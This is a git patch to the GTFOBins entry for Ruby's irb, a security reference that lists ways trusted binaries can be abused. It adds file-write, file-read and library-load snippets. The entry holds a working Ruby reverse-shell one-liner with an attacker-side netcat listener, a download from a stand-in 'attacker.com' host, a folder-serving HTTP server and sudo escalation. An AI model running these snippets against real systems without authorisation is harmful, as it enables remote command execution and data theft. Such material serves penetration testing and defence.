From 76f0b9cf458e9974ac5b746eb8c96e2d6022c38b Mon Sep 17 00:00:00 2001
From: Emilio
Date: Thu, 3 Jan 2019 20:27:53 +0000
Subject: [PATCH] Adjust and add file-write, file-read, and library-load to irb

---
 _gtfobins/irb.md | 24 ++++++++++++++++++------
 1 file changed, 18 insertions(+), 6 deletions(-)

diff --git a/_gtfobins/irb.md b/_gtfobins/irb.md
index de622df..c3d91df 100644
--- a/_gtfobins/irb.md
+++ b/_gtfobins/irb.md
@@ -5,24 +5,36 @@ functions:
 irb
 exec '/bin/bash'
 reverse-shell:
- - description: Run `nc -lvp RPORT` on the attacker box to receive the shell.
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 code: |
 export RHOST='127.0.0.1'
 export RPORT=9000
 irb
 require 'socket'; exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read} end
 file-upload:
- - description: Serve files in the local folder running an HTTP server on port 8080.
+ - description: Serve files in the local folder running an HTTP server on port 8888.
 code: |
 irb
- require 'webrick'; WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start;
+ require 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start;
 file-download:
- - description: Fetch a remote file via an HTTP GET request and store it in `PWD`.
+ - description: Fetch a remote file via HTTP GET request.
 code: |
 export URL=http://attacker.com/file_to_get
- export FILE=file_to_save
+ export LFILE=file_to_save
 irb
- require 'open-uri'; download = open(ENV['URL']); IO.copy_stream(download, ENV['FILE'])
+ require 'open-uri'; download = open(ENV['URL']); IO.copy_stream(download, ENV['LFILE'])
+ file-write:
+ - code: |
+ irb
+ File.open("file_to_write", "w+") { |f| f.write("DATA") }
+ file-read:
+ - code: |
+ irb
+ puts File.read("file_to_read")
+ library-load:
+ - code: |
+ irb
+ require "fiddle"; Fiddle.dlopen("lib.so")
 sudo:
 - code: |
 sudo irb